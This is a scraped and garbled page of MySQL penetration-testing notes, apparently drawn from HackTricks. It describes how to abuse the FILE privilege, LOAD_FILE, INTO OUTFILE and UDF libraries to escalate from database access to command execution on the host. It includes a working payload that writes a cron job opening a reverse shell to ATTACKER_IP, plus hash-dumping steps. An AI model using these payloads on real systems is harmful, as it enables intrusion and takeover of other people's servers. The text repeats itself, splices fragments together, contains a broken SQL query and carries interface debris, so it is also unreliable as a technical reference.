: Instructions on using LOAD_FILE() and INTO OUTFILE to read or write local files, which can lead to Remote Code Execution (RCE).
The holy grail is FILE privilege, which allows reading/writing files on the OS.
If the MySQL server runs as root or SYSTEM on the operating system, and the database user has the FILE privilege, you can compile and inject a custom shared library ( .so on Linux, .dll on Windows) to execute arbitrary system commands. SHOW VARIABLES LIKE 'plugin_dir'; Use code with caution. mysql hacktricks verified
If local access is gained, extract credentials from files or via auxiliary/scanner/mysql/mysql_hashdump Host Spoofing:
Gaining access to the MySQL console as a low-privilege user is just the beginning. To compromise the host machine, you need to escalate your database privileges or break out of the DBMS sandbox. Checking Current Privileges : Instructions on using LOAD_FILE() and INTO OUTFILE
Requires SUPER or SYSTEM_VARIABLES_ADMIN .
SELECT "* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" INTO OUTFILE '/etc/cron.d/reverse'; SHOW VARIABLES LIKE 'plugin_dir'; Use code with caution
On Windows, it is possible to achieve Remote Code Execution by writing binary data into the plugin directory to create a User-Defined Function (UDF). Privilege Escalation: Verify current user permissions with: user,password,create_priv,insert_priv,update_priv mysql.user; ``` Use code with caution. Copied to clipboard HackTricks 4. Configuration Security Audit
EN EN 
KO
JA
ZH
ES